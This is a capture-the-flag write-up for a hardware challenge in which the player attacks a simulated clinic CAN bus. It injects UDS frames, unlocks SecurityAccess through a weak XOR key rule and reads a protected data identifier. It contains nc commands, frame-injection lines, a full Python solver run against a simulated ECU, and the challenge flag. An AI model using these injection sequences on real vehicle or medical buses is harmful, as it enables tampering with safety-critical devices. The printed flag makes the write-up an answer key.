ESPILON-CTF-2026-Writeups/Hardware/CAN_Bus_Implant/README.md
Eun0us 6a0877384d [+] Writeups v2 — sync solves, real points, scoreboard stats, cleanup
- Remove undeployed challenges: Phantom_Byte, Cr4cK_w1f1, Lain_Br34kC0r3 V1,
  Lain_VS_Knights, Lets_All_Love_UART, AETHER_NET, Last_Train_451, Web3/
- Sync 24 solve/ files from main CTF-Espilon repo
- Update all READMEs with real CTFd final scores at freeze
- Add git-header.png banner
- Rewrite README: scoreboard top 10, edition stats (1410 users, 264 boards,
  1344 solves), correct freeze date March 26 2026
2026-03-27 21:27:45 +01:00

# CAN Bus Implant
| Field | Value |
|-------|-------|
| Category | Hardware |
| Difficulty | Medium-Hard |
| Points | 400 |
| Author | Eun0us |
| CTF | Espilon 2026 |
---
## Description
The CAN bus of Clinique Sainte-Mika connects medical equipment.
A sniffing tap and injection point give you access to the raw bus traffic.
Analyze the frames, identify the UDS diagnostic protocol in use, and perform
a security access sequence to extract classified data.
- Sniff (read-only): `tcp/<host>:3600`
- Inject (write): `tcp/<host>:3601`
Format: **ESPILON{...}**

---
## TL;DR
Sniff the CAN bus, identify the UDS diagnostic protocol from request/response patterns,
enter an extended diagnostic session, perform a SecurityAccess seed/key exchange (XOR key
derivation), then read DID 0xFF01 to get the flag.

---
## Tools
| Tool | Purpose |
|------|---------|
| `nc` | Connect to sniff and inject ports |
| Python 3 | Automated scripting |
| Knowledge of UDS (ISO 14229) | Understand the protocol services |
---
## Solution
### Step 1 — Connect to both ports
Open two terminals simultaneously:
```bash
# Terminal 1: Sniff
nc <host> 3600
# Terminal 2: Inject
nc <host> 3601
```
![two terminal windows showing sniff output and inject prompt](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_terminals.png)
### Step 2 — Observe the traffic
Watch the sniff port. The following patterns emerge:
| CAN ID | Type | Description |
|--------|------|-------------|
| `0x100` | Heartbeat | Periodic counter |
| `0x200`-`0x203` | Sensor data | Temperature, heart rate |
| `0x7DF` | Broadcast | OBD diagnostic request (functional addressing) |
| `0x7E0`/`0x7E8` | UDS pair | Request on `0x7E0`, response on `0x7E8` (periodic VIN reads) |
The `0x7E0`/`0x7E8` pair is the UDS diagnostic channel.
![sniff output showing the 0x7E0/0x7E8 request/response pattern](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_sniff.png)
### Step 3 — Enter extended diagnostic session
Inject a DiagnosticSessionControl (service 0x10, session 0x03 = extended):
```text
send 7E0 02 10 03 00 00 00 00 00
```
The sniff port shows the positive response on `0x7E8`: `50 03`.
### Step 4 — Request a security seed
Send SecurityAccess (service 0x27, subfunction 0x01 = request seed):
```text
send 7E0 02 27 01 00 00 00 00 00
```
The response contains a 4-byte seed: `67 01 XX XX XX XX`
![seed bytes visible in the 0x7E8 response](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_seed.png)
### Step 5 — Compute the key and authenticate
The key derivation is XOR of each seed byte with the constant `0x42`; the four resulting bytes are the `KK KK KK KK` of the next frame:
```python
# Copy the four seed bytes from the 0x7E8 response (67 01 XX XX XX XX)
seed = bytes.fromhex("XX XX XX XX")     # replace XX with the observed seed bytes
key = bytes(b ^ 0x42 for b in seed)     # challenge's key rule: seed XOR 0x42
print(key.hex(" ").upper())             # -> the KK KK KK KK bytes for the 27 02 request
```
Send SecurityAccess (subfunction 0x02 = send key):
```text
send 7E0 06 27 02 KK KK KK KK 00
```
Positive response: `67 02`
### Step 6 — Read the flag from DID 0xFF01
Send ReadDataByIdentifier (service 0x22, DID 0xFF01):
```text
send 7E0 03 22 FF 01 00 00 00 00
```
The response on `0x7E8` contains the flag.
![0x7E8 response containing the flag bytes after successful security access](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_flag.png)
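The six steps above, carried through as an added example rather than code from the original writeup: a small UDS client that builds the request frames (with ISO-TP single-frame PCI bytes, exactly the `send 7E0 ...` lines shown), derives the key with the XOR-0x42 rule, and reassembles the response, including the multi-frame ISO-TP (first frame + consecutive frames) case that a 31-byte flag record would need. Because the challenge server is not reachable offline, the client is driven against `SimEcu`, a constructed stand-in implementing only the services the solution uses; its seed value, negative-response codes and frame padding are assumptions, not observed server behaviour.

```python
# Added example, not from the writeup: the Step 3-6 UDS exchange run end to end
# against an in-process simulated ECU (SimEcu, constructed) so it executes offline.
# Framing follows ISO 15765-2 (ISO-TP); IDs 0x7E0/0x7E8, DID 0xFF01 and the
# "seed XOR 0x42" key rule come from the writeup, everything else is assumed.
REQ_ID, RESP_ID = 0x7E0, 0x7E8
XOR_KEY = 0x42

def single_frame(payload: bytes) -> bytes:
    """ISO-TP single frame: PCI byte = payload length (<= 7), payload, zero padding to 8."""
    if len(payload) > 7:
        raise ValueError("use multi_frame for payloads longer than 7 bytes")
    return (bytes([len(payload)]) + payload).ljust(8, b"\x00")

def multi_frame(payload: bytes) -> list:
    """Split a long payload into an ISO-TP first frame (12-bit length) + consecutive frames."""
    if len(payload) <= 7:
        return [single_frame(payload)]
    n = len(payload)
    frames = [bytes([0x10 | (n >> 8), n & 0xFF]) + payload[:6]]
    for sn, off in enumerate(range(6, n, 7), start=1):
        frames.append((bytes([0x20 | (sn & 0x0F)]) + payload[off:off + 7]).ljust(8, b"\x00"))
    return frames

def send_line(can_id: int, frame: bytes) -> str:
    """Render a frame as the inject-port command shown in the writeup."""
    return f"send {can_id:03X} " + " ".join(f"{b:02X}" for b in frame)

def derive_key(seed: bytes) -> bytes:
    """The challenge's (deliberately weak) key rule: each seed byte XOR 0x42."""
    return bytes(b ^ XOR_KEY for b in seed)

class IsoTpReassembler:
    """Turns SF/FF/CF frames from one CAN ID back into complete UDS payloads."""
    def __init__(self):
        self.expected, self.buf = 0, bytearray()

    def feed(self, frame: bytes):
        kind = frame[0] >> 4
        if kind == 0:                                   # single frame: done immediately
            return bytes(frame[1:1 + (frame[0] & 0x0F)])
        if kind == 1:                                   # first frame: total length + 6 bytes
            self.expected = ((frame[0] & 0x0F) << 8) | frame[1]
            self.buf = bytearray(frame[2:])
        elif kind == 2:                                 # consecutive frame: 7 more bytes
            self.buf += frame[1:]
        if self.expected and len(self.buf) >= self.expected:
            data, self.expected = bytes(self.buf[:self.expected]), 0
            return data
        return None                                     # still reassembling

class SimEcu:
    """Constructed stand-in for the clinic ECU: only the services the writeup uses."""
    FLAG = b"ESPILON{c4n_bus_1mpl4nt_4ct1v3}"

    def __init__(self, seed: bytes = b"\xDE\xAD\xBE\xEF"):  # seed value is made up
        self.seed, self.session, self.unlocked = seed, 0x01, False

    def handle(self, frame: bytes) -> list:
        if frame[0] >> 4 == 3:                          # tester flow control: no reply
            return []
        body = frame[1:1 + (frame[0] & 0x0F)]
        sid, args = body[0], body[1:]
        if sid == 0x10 and args == b"\x03":
            self.session = 0x03
            return [single_frame(b"\x50\x03")]
        if sid == 0x27 and self.session == 0x03:
            if args == b"\x01":
                return [single_frame(b"\x67\x01" + self.seed)]
            if args[:1] == b"\x02" and args[1:] == derive_key(self.seed):
                self.unlocked = True
                return [single_frame(b"\x67\x02")]
            return [single_frame(b"\x7F\x27\x35")]      # NRC 0x35 invalidKey
        if sid == 0x22 and args == b"\xFF\x01" and self.unlocked:
            return multi_frame(b"\x62\xFF\x01" + self.FLAG)   # 34 bytes: FF + 4 CFs
        return [single_frame(b"\x7F" + bytes([sid]) + b"\x33")]  # NRC 0x33 securityAccessDenied

def solve(ecu: SimEcu) -> bytes:
    """Steps 3-6 of the writeup; returns the DID 0xFF01 record (the flag bytes)."""
    rx = IsoTpReassembler()

    def request(payload: bytes) -> bytes:
        frame = single_frame(payload)
        print(send_line(REQ_ID, frame))                 # what you would type on port 3601
        pending = list(ecu.handle(frame))
        while pending:
            f = pending.pop(0)
            if f[0] >> 4 == 1:                          # first frame seen: send flow control
                pending += ecu.handle(bytes([0x30, 0x00, 0x00]).ljust(8, b"\x00"))
            done = rx.feed(f)
            if done is not None:
                if done[0] == 0x7F:                     # negative response: 7F <sid> <nrc>
                    raise RuntimeError(f"NRC 0x{done[2]:02X} for service 0x{done[1]:02X}")
                return done
        raise RuntimeError("no response on 0x%03X" % RESP_ID)

    assert request(b"\x10\x03") == b"\x50\x03"          # extended diagnostic session
    seed = request(b"\x27\x01")[2:6]                    # 67 01 + 4 seed bytes
    assert request(b"\x27\x02" + derive_key(seed)) == b"\x67\x02"
    return request(b"\x22\xFF\x01")[3:]                 # strip 62 FF 01

if __name__ == "__main__":
    print(solve(SimEcu()).decode())
```

To run it against the real challenge, replace `ecu.handle` with a writer to `tcp/<host>:3601` and a reader that parses frames off `tcp/<host>:3600` for ID `0x7E8` (the sniff port's line format is not documented in the writeup, so that parser is left to the reader); the frame construction, key derivation and reassembly stay the same. Note that a real ECU will not send the consecutive frames of a long response until it has received the tester's flow-control frame (`30 00 00`), which is why `request` sends one as soon as a first frame appears.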
### Key concepts
- **CAN bus**: Controller Area Network — a broadcast medium with no sender authentication or
  encryption at the frame level, so any node with bus access can inject frames under any ID;
  widely used in vehicles and medical equipment
- **UDS (ISO 14229)**: Diagnostic protocol with services including `DiagnosticSessionControl`
  (0x10), `SecurityAccess` (0x27), `ReadDataByIdentifier` (0x22); positive responses use
  SID + 0x40 (`50`, `67`, `62`), negative responses start with `7F`
- **SecurityAccess**: Challenge-response authentication — the ECU sends a seed and the tester must
  answer with the matching key. Here the key is trivially `seed XOR 0x42`, so a single sniffed
  seed/key pair is enough to recover the rule and unlock the ECU at will.
- **Traffic analysis**: Identifying request/response patterns (here the `0x7E0`/`0x7E8` pair) from
  raw CAN bus traffic is the first step in any CAN bus penetration test
---
## Flag
`ESPILON{c4n_bus_1mpl4nt_4ct1v3}`